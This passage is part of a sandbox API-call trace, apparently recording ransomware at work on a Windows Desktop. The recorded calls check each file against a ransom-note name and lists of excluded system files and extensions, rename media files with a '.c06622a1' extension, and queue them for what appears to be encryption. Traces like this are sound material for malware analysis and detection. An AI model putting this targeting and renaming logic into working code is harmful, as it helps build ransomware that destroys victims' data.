halpmcxz\\desktop\\a1iuzfll6juvahjacm.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0147.607] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.607] ReadFile (in: hFile=0x618, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.608] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x55c9601a [0147.608] RtlComputeCrc32 (PartialCrc=0x601a, Buffer=0x3feb74, Length=0x80) returned 0xee6fe035 [0147.608] RtlComputeCrc32 (PartialCrc=0xe035, Buffer=0x3feb74, Length=0x80) returned 0x6402ed81 [0147.608] RtlComputeCrc32 (PartialCrc=0xed81, Buffer=0x3feb74, Length=0x80) returned 0xc989ffe3 [0147.608] RtlComputeCrc32 (PartialCrc=0xffe3, Buffer=0x3feb74, Length=0x80) returned 0x42b9d10f [0147.608] CloseHandle (hObject=0x618) returned 1 [0147.608] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.608] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A1IUZFLl6juvAhJaCm.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A1IUZFLl6juvAhJaCm.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A1IUZFLl6juvAhJaCm.mkv" [0147.608] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A1IUZFLl6juvAhJaCm.mkv") returned 0x40 [0147.608] wcscpy (in: _Dest=0x44e0100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.609] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A1IUZFLl6juvAhJaCm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a1iuzfll6juvahjacm.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A1IUZFLl6juvAhJaCm.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a1iuzfll6juvahjacm.mkv.c06622a1"), dwFlags=0x8) returned 1 [0147.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A1IUZFLl6juvAhJaCm.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a1iuzfll6juvahjacm.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x618 [0147.611] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.611] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x48b0020 [0147.617] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1c4867eb [0147.617] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x73496d12 [0147.617] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x36ea3091 [0147.617] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x54e78c97 [0147.617] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x54eefd47 [0147.617] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4e59252f [0147.617] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x24430826 [0147.617] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b46daf3 [0147.620] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x48b0094, Length=0x80) returned 0x9b679125 [0147.620] RtlComputeCrc32 (PartialCrc=0x9125, Buffer=0x48b0094, Length=0x80) returned 0xc83f092 [0147.620] RtlComputeCrc32 (PartialCrc=0xf092, Buffer=0x48b0094, Length=0x80) returned 0xb3ad88f7 [0147.620] RtlComputeCrc32 (PartialCrc=0x88f7, Buffer=0x48b0094, Length=0x80) returned 0x3d191fbe [0147.620] RtlComputeCrc32 (PartialCrc=0x1fbe, Buffer=0x48b0094, Length=0x80) returned 0x241413c7 [0147.620] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0147.620] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.620] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.620] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba754e0, ftCreationTime.dwHighDateTime=0x1d5dc3e, ftLastAccessTime.dwLowDateTime=0xde013080, ftLastAccessTime.dwHighDateTime=0x1d5e23d, ftLastWriteTime.dwLowDateTime=0xde013080, ftLastWriteTime.dwHighDateTime=0x1d5e23d, nFileSizeHigh=0x0, nFileSizeLow=0x17930, dwReserved0=0x0, dwReserved1=0x0, cFileName="C0QBEz.gif", cAlternateFileName="")) returned 1 [0147.621] _wcsicmp (_Str1="C0QBEz.gif", _Str2="README.c06622a1.TXT") returned -15 [0147.621] wcsstr (_Str="C0QBEz.gif", _SubStr="README") returned 0x0 [0147.621] _wcsicmp (_Str1="autorun.inf", _Str2="C0QBEz.gif") returned -2 [0147.621] wcslen (_String="autorun.inf") returned 0xb [0147.621] _wcsicmp (_Str1="boot.ini", _Str2="C0QBEz.gif") returned -1 [0147.621] wcslen (_String="boot.ini") returned 0x8 [0147.621] _wcsicmp (_Str1="bootfont.bin", _Str2="C0QBEz.gif") returned -1 [0147.621] wcslen (_String="bootfont.bin") returned 0xc [0147.621] _wcsicmp (_Str1="bootsect.bak", _Str2="C0QBEz.gif") returned -1 [0147.621] wcslen (_String="bootsect.bak") returned 0xc [0147.621] _wcsicmp (_Str1="desktop.ini", _Str2="C0QBEz.gif") returned 1 [0147.621] wcslen (_String="desktop.ini") returned 0xb [0147.621] _wcsicmp (_Str1="iconcache.db", _Str2="C0QBEz.gif") returned 6 [0147.621] wcslen (_String="iconcache.db") returned 0xc [0147.621] _wcsicmp (_Str1="ntldr", _Str2="C0QBEz.gif") returned 11 [0147.621] wcslen (_String="ntldr") returned 0x5 [0147.621] _wcsicmp (_Str1="ntuser.dat", _Str2="C0QBEz.gif") returned 11 [0147.621] wcslen (_String="ntuser.dat") returned 0xa [0147.621] _wcsicmp (_Str1="ntuser.dat.log", _Str2="C0QBEz.gif") returned 11 [0147.621] wcslen (_String="ntuser.dat.log") returned 0xe [0147.621] _wcsicmp (_Str1="ntuser.ini", _Str2="C0QBEz.gif") returned 11 [0147.621] wcslen (_String="ntuser.ini") returned 0xa [0147.621] _wcsicmp (_Str1="thumbs.db", _Str2="C0QBEz.gif") returned 17 [0147.621] wcslen (_String="thumbs.db") returned 0x9 [0147.622] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0147.622] wcslen (_String="386") returned 0x3 [0147.622] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0147.622] wcslen (_String="adv") returned 0x3 [0147.622] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0147.622] wcslen (_String="ani") returned 0x3 [0147.622] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0147.622] wcslen (_String="bat") returned 0x3 [0147.622] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0147.622] wcslen (_String="bin") returned 0x3 [0147.622] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0147.622] wcslen (_String="cab") returned 0x3 [0147.622] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0147.622] wcslen (_String="cmd") returned 0x3 [0147.622] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0147.622] wcslen (_String="com") returned 0x3 [0147.622] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0147.622] wcslen (_String="cpl") returned 0x3 [0147.622] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0147.622] wcslen (_String="cur") returned 0x3 [0147.622] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0147.622] wcslen (_String="deskthemepack") returned 0xd [0147.622] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0147.622] wcslen (_String="diagcab") returned 0x7 [0147.622] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0147.623] wcslen (_String="diagcfg") returned 0x7 [0147.623] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0147.623] wcslen (_String="diagpkg") returned 0x7 [0147.623] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0147.623] wcslen (_String="dll") returned 0x3 [0147.623] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0147.623] wcslen (_String="drv") returned 0x3 [0147.623] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0147.623] wcslen (_String="exe") returned 0x3 [0147.623] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0147.623] wcslen (_String="hlp") returned 0x3 [0147.623] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0147.623] wcslen (_String="icl") returned 0x3 [0147.623] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0147.623] wcslen (_String="icns") returned 0x4 [0147.623] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0147.623] wcslen (_String="ico") returned 0x3 [0147.623] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0147.623] wcslen (_String="ics") returned 0x3 [0147.623] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0147.623] wcslen (_String="idx") returned 0x3 [0147.623] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0147.623] wcslen (_String="ldf") returned 0x3 [0147.623] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0147.623] wcslen (_String="lnk") returned 0x3 [0147.623] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0147.623] wcslen (_String="mod") returned 0x3 [0147.623] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0147.623] wcslen (_String="mpa") returned 0x3 [0147.623] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0147.623] wcslen (_String="msc") returned 0x3 [0147.623] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0147.624] wcslen (_String="msp") returned 0x3 [0147.624] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0147.624] wcslen (_String="msstyles") returned 0x8 [0147.624] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0147.624] wcslen (_String="msu") returned 0x3 [0147.624] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0147.624] wcslen (_String="nls") returned 0x3 [0147.624] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0147.624] wcslen (_String="nomedia") returned 0x7 [0147.624] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0147.624] wcslen (_String="ocx") returned 0x3 [0147.624] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0147.624] wcslen (_String="prf") returned 0x3 [0147.624] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0147.624] wcslen (_String="ps1") returned 0x3 [0147.624] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0147.624] wcslen (_String="rom") returned 0x3 [0147.624] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0147.624] wcslen (_String="rtp") returned 0x3 [0147.624] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0147.624] wcslen (_String="scr") returned 0x3 [0147.624] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0147.624] wcslen (_String="shs") returned 0x3 [0147.624] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0147.624] wcslen (_String="spl") returned 0x3 [0147.624] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0147.624] wcslen (_String="sys") returned 0x3 [0147.624] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0147.624] wcslen (_String="theme") returned 0x5 [0147.624] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0147.624] wcslen (_String="themepack") returned 0x9 [0147.625] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0147.625] wcslen (_String="wpx") returned 0x3 [0147.625] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0147.625] wcslen (_String="lock") returned 0x4 [0147.625] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0147.625] wcslen (_String="key") returned 0x3 [0147.625] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0147.625] wcslen (_String="hta") returned 0x3 [0147.625] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0147.625] wcslen (_String="msi") returned 0x3 [0147.625] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0147.625] wcslen (_String="pdb") returned 0x3 [0147.625] _wcsicmp (_Str1="sql", _Str2="gif") returned 12 [0147.625] wcslen (_String="sql") returned 0x3 [0147.625] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0147.625] wcslen (_String="sqlite") returned 0x6 [0147.625] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.625] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.625] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.625] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.625] wcscpy (in: _Dest=0x44d00cc, _Source="C0QBEz.gif" | out: _Dest="C0QBEz.gif") returned="C0QBEz.gif" [0147.625] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C0QBEz.gif", dwFileAttributes=0x80) returned 1 [0147.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C0QBEz.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c0qbez.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0147.626] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.626] ReadFile (in: hFile=0x628, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.626] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x9d78e821 [0147.626] RtlComputeCrc32 (PartialCrc=0xe821, Buffer=0x3feb74, Length=0x80) returned 0x9c6c2adf [0147.626] RtlComputeCrc32 (PartialCrc=0x2adf, Buffer=0x3feb74, Length=0x80) returned 0x89b482bd [0147.627] RtlComputeCrc32 (PartialCrc=0x82bd, Buffer=0x3feb74, Length=0x80) returned 0xeebb5a04 [0147.627] RtlComputeCrc32 (PartialCrc=0x5a04, Buffer=0x3feb74, Length=0x80) returned 0x4b1563b0 [0147.627] CloseHandle (hObject=0x628) returned 1 [0147.627] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.627] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C0QBEz.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C0QBEz.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C0QBEz.gif" [0147.627] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C0QBEz.gif") returned 0x34 [0147.627] wcscpy (in: _Dest=0x44e00e8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.627] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C0QBEz.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c0qbez.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C0QBEz.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c0qbez.gif.c06622a1"), dwFlags=0x8) returned 1 [0147.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C0QBEz.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c0qbez.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x628 [0147.629] CreateIoCompletionPort (FileHandle=0x628, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.629] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4940020 [0147.635] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a0e979b [0147.635] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2f1c76c0 [0147.635] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x143334ae [0147.635] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x32ec119 [0147.635] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xaa31b8f [0147.635] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1d71471d [0147.635] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x40f6f11 [0147.635] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x10a55ee7 [0147.639] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4940094, Length=0x80) returned 0x4fe04428 [0147.639] RtlComputeCrc32 (PartialCrc=0x4428, Buffer=0x4940094, Length=0x80) returned 0x20b3456d [0147.639] RtlComputeCrc32 (PartialCrc=0x456d, Buffer=0x4940094, Length=0x80) returned 0x87835e26 [0147.639] RtlComputeCrc32 (PartialCrc=0x5e26, Buffer=0x4940094, Length=0x80) returned 0x43f6bdfe [0147.639] RtlComputeCrc32 (PartialCrc=0xbdfe, Buffer=0x4940094, Length=0x80) returned 0xf15f0d0d [0147.639] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0147.639] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.639] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.639] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae72f0c0, ftCreationTime.dwHighDateTime=0x1d5e25a, ftLastAccessTime.dwLowDateTime=0x660cc930, ftLastAccessTime.dwHighDateTime=0x1d5dbc2, ftLastWriteTime.dwLowDateTime=0x660cc930, ftLastWriteTime.dwHighDateTime=0x1d5dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x1328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="C5glW.m4a", cAlternateFileName="")) returned 1 [0147.639] _wcsicmp (_Str1="C5glW.m4a", _Str2="README.c06622a1.TXT") returned -15 [0147.639] wcsstr (_Str="C5glW.m4a", _SubStr="README") returned 0x0 [0147.639] _wcsicmp (_Str1="autorun.inf", _Str2="C5glW.m4a") returned -2 [0147.639] wcslen (_String="autorun.inf") returned 0xb [0147.639] _wcsicmp (_Str1="boot.ini", _Str2="C5glW.m4a") returned -1 [0147.639] wcslen (_String="boot.ini") returned 0x8 [0147.639] _wcsicmp (_Str1="bootfont.bin", _Str2="C5glW.m4a") returned -1 [0147.639] wcslen (_String="bootfont.bin") returned 0xc [0147.639] _wcsicmp (_Str1="bootsect.bak", _Str2="C5glW.m4a") returned -1 [0147.639] wcslen (_String="bootsect.bak") returned 0xc [0147.639] _wcsicmp (_Str1="desktop.ini", _Str2="C5glW.m4a") returned 1 [0147.639] wcslen (_String="desktop.ini") returned 0xb [0147.639] _wcsicmp (_Str1="iconcache.db", _Str2="C5glW.m4a") returned 6 [0147.639] wcslen (_String="iconcache.db") returned 0xc [0147.639] _wcsicmp (_Str1="ntldr", _Str2="C5glW.m4a") returned 11 [0147.639] wcslen (_String="ntldr") returned 0x5 [0147.639] _wcsicmp (_Str1="ntuser.dat", _Str2="C5glW.m4a") returned 11 [0147.640] wcslen (_String="ntuser.dat") returned 0xa [0147.640] _wcsicmp (_Str1="ntuser.dat.log", _Str2="C5glW.m4a") returned 11 [0147.640] wcslen (_String="ntuser.dat.log") returned 0xe [0147.640] _wcsicmp (_Str1="ntuser.ini", _Str2="C5glW.m4a") returned 11 [0147.640] wcslen (_String="ntuser.ini") returned 0xa [0147.640] _wcsicmp (_Str1="thumbs.db", _Str2="C5glW.m4a") returned 17 [0147.640] wcslen (_String="thumbs.db") returned 0x9 [0147.640] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0147.640] wcslen (_String="386") returned 0x3 [0147.640] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0147.640] wcslen (_String="adv") returned 0x3 [0147.640] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0147.640] wcslen (_String="ani") returned 0x3 [0147.640] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0147.640] wcslen (_String="bat") returned 0x3 [0147.640] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0147.640] wcslen (_String="bin") returned 0x3 [0147.640] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0147.640] wcslen (_String="cab") returned 0x3 [0147.640] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0147.640] wcslen (_String="cmd") returned 0x3 [0147.640] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0147.640] wcslen (_String="com") returned 0x3 [0147.640] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0147.640] wcslen (_String="cpl") returned 0x3 [0147.640] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0147.640] wcslen (_String="cur") returned 0x3 [0147.640] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0147.640] wcslen (_String="deskthemepack") returned 0xd [0147.640] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0147.641] wcslen (_String="diagcab") returned 0x7 [0147.641] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0147.641] wcslen (_String="diagcfg") returned 0x7 [0147.641] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0147.641] wcslen (_String="diagpkg") returned 0x7 [0147.641] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0147.641] wcslen (_String="dll") returned 0x3 [0147.641] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0147.641] wcslen (_String="drv") returned 0x3 [0147.641] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0147.641] wcslen (_String="exe") returned 0x3 [0147.641] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0147.641] wcslen (_String="hlp") returned 0x3 [0147.641] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0147.641] wcslen (_String="icl") returned 0x3 [0147.641] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0147.641] wcslen (_String="icns") returned 0x4 [0147.641] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0147.641] wcslen (_String="ico") returned 0x3 [0147.641] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0147.641] wcslen (_String="ics") returned 0x3 [0147.641] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0147.641] wcslen (_String="idx") returned 0x3 [0147.641] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0147.641] wcslen (_String="ldf") returned 0x3 [0147.641] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0147.641] wcslen (_String="lnk") returned 0x3 [0147.641] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0147.641] wcslen (_String="mod") returned 0x3 [0147.641] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0147.641] wcslen (_String="mpa") returned 0x3 [0147.641] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0147.642] wcslen (_String="msc") returned 0x3 [0147.642] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0147.642] wcslen (_String="msp") returned 0x3 [0147.642] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0147.642] wcslen (_String="msstyles") returned 0x8 [0147.642] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0147.642] wcslen (_String="msu") returned 0x3 [0147.642] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0147.642] wcslen (_String="nls") returned 0x3 [0147.642] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0147.642] wcslen (_String="nomedia") returned 0x7 [0147.642] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0147.642] wcslen (_String="ocx") returned 0x3 [0147.642] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0147.642] wcslen (_String="prf") returned 0x3 [0147.642] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0147.642] wcslen (_String="ps1") returned 0x3 [0147.642] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0147.642] wcslen (_String="rom") returned 0x3 [0147.642] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0147.642] wcslen (_String="rtp") returned 0x3 [0147.642] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0147.642] wcslen (_String="scr") returned 0x3 [0147.642] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0147.642] wcslen (_String="shs") returned 0x3 [0147.642] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0147.642] wcslen (_String="spl") returned 0x3 [0147.642] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0147.642] wcslen (_String="sys") returned 0x3 [0147.642] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0147.642] wcslen (_String="theme") returned 0x5 [0147.643] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0147.643] wcslen (_String="themepack") returned 0x9 [0147.643] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0147.643] wcslen (_String="wpx") returned 0x3 [0147.643] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0147.643] wcslen (_String="lock") returned 0x4 [0147.643] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0147.643] wcslen (_String="key") returned 0x3 [0147.643] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0147.643] wcslen (_String="hta") returned 0x3 [0147.643] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0147.643] wcslen (_String="msi") returned 0x3 [0147.643] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0147.643] wcslen (_String="pdb") returned 0x3 [0147.643] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0147.643] wcslen (_String="sql") returned 0x3 [0147.643] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0147.643] wcslen (_String="sqlite") returned 0x6 [0147.643] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.643] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.643] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" 